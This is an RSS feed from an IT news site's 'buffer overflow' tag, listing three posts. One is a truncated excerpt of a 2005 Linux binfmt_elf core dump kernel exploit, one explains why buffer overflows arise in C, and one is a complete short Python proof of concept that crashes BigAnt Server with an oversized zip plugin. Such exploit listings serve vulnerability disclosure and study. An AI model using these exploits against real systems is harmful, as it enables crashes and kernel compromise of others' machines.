<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>GO IT WORLD &#124; IT TECH &#124; IT NEWS &#187; buffer overflow</title>
	<atom:link href="http://www.goitworld.com/tag/buffer-overflow/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.goitworld.com</link>
	<description>goitworld.com</description>
	<lastBuildDate>Tue, 10 Jan 2012 10:03:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.2</generator>
		<item>
		<title>Linux binfmt_elf core dump buffer overflow</title>
		<link>http://www.goitworld.com/linux-binfmt_elf-core-dump-buffer-overflow/</link>
		<comments>http://www.goitworld.com/linux-binfmt_elf-core-dump-buffer-overflow/#comments</comments>
		<pubDate>Mon, 19 Sep 2011 13:45:40 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[kernel-2.2.27]]></category>
		<category><![CDATA[binfmt_elf]]></category>
		<category><![CDATA[buffer overflow]]></category>
		<category><![CDATA[core dump]]></category>
		<category><![CDATA[exploit]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/linux-binfmt_elf-core-dump-buffer-overflow/</guid>
		<description><![CDATA[<p style="float: right;margin: 4px;">


</p><p>/*   <br />* Linux binfmt_elf core dump buffer overflow    <br />*    <br />* Copyright (c) 2005 iSEC Security Research. All Rights Reserved.    <br />*    <br />* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED &#34;AS IS&#34;    <br />* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION    <br />* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.    <br />*    <br />*/    <br />// phase 1    <br />#include &#60;stdio.h&#62;    <br />#include &#60;stdlib.h&#62;    <br />#include &#60;errno.h&#62;    <br />#include &#60;unistd.h&#62;</p>
<p>#include &#60;sys/time.h&#62;   <br />#include &#60;sys/resource.h&#62;</p>
<p>#include &#60;asm/page.h&#62;</p>
<p>static char *env[10], *argv[4];    <br />static char page[PAGE_SIZE];    <br />static char&#8230; <a href="http://www.goitworld.com/linux-binfmt_elf-core-dump-buffer-overflow/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/linux-binfmt_elf-core-dump-buffer-overflow/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Buffer Overflows exploit</title>
		<link>http://www.goitworld.com/buffer-overflows-exploit/</link>
		<comments>http://www.goitworld.com/buffer-overflows-exploit/#comments</comments>
		<pubDate>Mon, 06 Dec 2010 07:04:37 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[buffer overflow]]></category>
		<category><![CDATA[exploit]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/buffer-overflows-exploit/</guid>
		<description><![CDATA[<p><a name="Buffer overflow"></a>Buffer overflow vulnerabilities have been around since the early days of computers and still exist today. Most Internet <a name="idx-CHP-3-0595"></a><a name="buffer overflow"></a>worms use buffer overflow vulnerabilities to propagate, and even the most recent <a name="idx-CHP-3-0596"></a><a name="vulnerability in"></a>zero-day VML vulnerability in <a name="idx-CHP-3-0597"></a>Internet Explorer is due to a buffer overflow.</p>
<p>C is a high-level programming language, but it assumes that the <a name="idx-CHP-3-0598"></a>programmer is responsible <a name="idx-CHP-3-0599"></a>for <a name="idx-CHP-3-0600"></a><a name="the resulting"></a>data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer&#8230; <a href="http://www.goitworld.com/buffer-overflows-exploit/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/buffer-overflows-exploit/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>BigAnt Server &lt;= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2</title>
		<link>http://www.goitworld.com/bigant-server-2-50-sp6-local-zip-file-buffer-overflow-poc-2/</link>
		<comments>http://www.goitworld.com/bigant-server-2-50-sp6-local-zip-file-buffer-overflow-poc-2/#comments</comments>
		<pubDate>Tue, 20 Oct 2009 11:59:56 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[bigant]]></category>
		<category><![CDATA[buffer overflow]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/bigant-server-2-50-sp6-local-zip-file-buffer-overflow-poc-2/</guid>
		<description><![CDATA[<p>#!/usr/bin/env python </p>
<p>########################################################################   <br />#    <br /># BigAnt Server &#60;= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2    <br /># Found By:&#160;&#160;&#160;&#160; Dr_IDE    <br /># Tested:&#160;&#160;&#160;&#160;&#160;&#160; XPSP3    <br /># Usage:&#160;&#160;&#160;&#160;&#160;&#160;&#160; Open BigAnt Console, Go to Plug-In, Add our zip, Boom.    <br />#    <br />######################################################################## </p>
<p>buff = (&#34;\x41&#34; * 10000) </p>
<p>f1 = open(&#34;BigAntPlugIn.zip&#34;,&#34;w&#34;)   <br />f1.write(buff)    <br />f1.close()</p>
]]></description>
		<wfw:commentRss>http://www.goitworld.com/bigant-server-2-50-sp6-local-zip-file-buffer-overflow-poc-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

